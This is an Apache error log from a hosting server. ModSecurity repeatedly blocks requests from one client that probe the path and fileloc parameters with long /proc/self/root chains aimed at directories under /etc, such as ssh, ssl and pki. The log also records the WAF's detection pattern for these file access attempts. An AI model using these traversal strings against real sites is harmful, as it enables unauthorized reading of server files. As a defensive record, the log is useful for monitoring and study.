[Wed Mar 18 08:36:12.182616 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:51562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOKta6ubjKNq_cu4aBuwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:19.231932 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:45128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOMeyqAr6etmhZHNqnVwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:36:24.387054 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:54594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOOOyqAr6etmhZHNqnWwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:28.021577 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:54602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOPOyqAr6etmhZHNqnYAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:36:29.323079 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:54616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOPeoXxyEfFpUF8f9YPQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:36:36.215240 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:53282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqORPu8EFLIOrSqIpvufgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:41.025247 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:53288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOSeyqAr6etmhZHNqnaAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:43.426631 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:54086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOSymAPhZkrhU8w4lWoAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:44.267903 2026] [mime_magic:error] [pid 15051:tid 140411624429312] (70014)End of file found: [client 57.141.18.31:54950] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:36:44.842014 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:54092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOTNa6ubjKNq_cu4aB1gAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:46.159020 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:54094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOTta6ubjKNq_cu4aB3AAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:47.489838 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:54108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOT9a6ubjKNq_cu4aB3gAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:48.886270 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:54124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOUCmAPhZkrhU8w4lWowAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:50.231105 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:40522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOUuyqAr6etmhZHNqnaQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:51.493590 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:40538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOU_u8EFLIOrSqIpvuhwAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:52.785859 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:40552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOVCmAPhZkrhU8w4lWpgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:54.090137 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:40564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOVuoXxyEfFpUF8f9YSgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:56.458995 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:40578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOWAkwaGbbGflqUZD6OgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:36:57.777289 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:40590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOWdY0UrI5A3LftIyKBwAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:00.536952 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:40594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOW8df6f5d65gmYZS9oQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:02.411231 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:48582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOXuw_le52K8_3pV3KAQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:03.730272 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:48592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOXymAPhZkrhU8w4lWqgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:06.934912 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:48602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOYuw_le52K8_3pV3KCwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
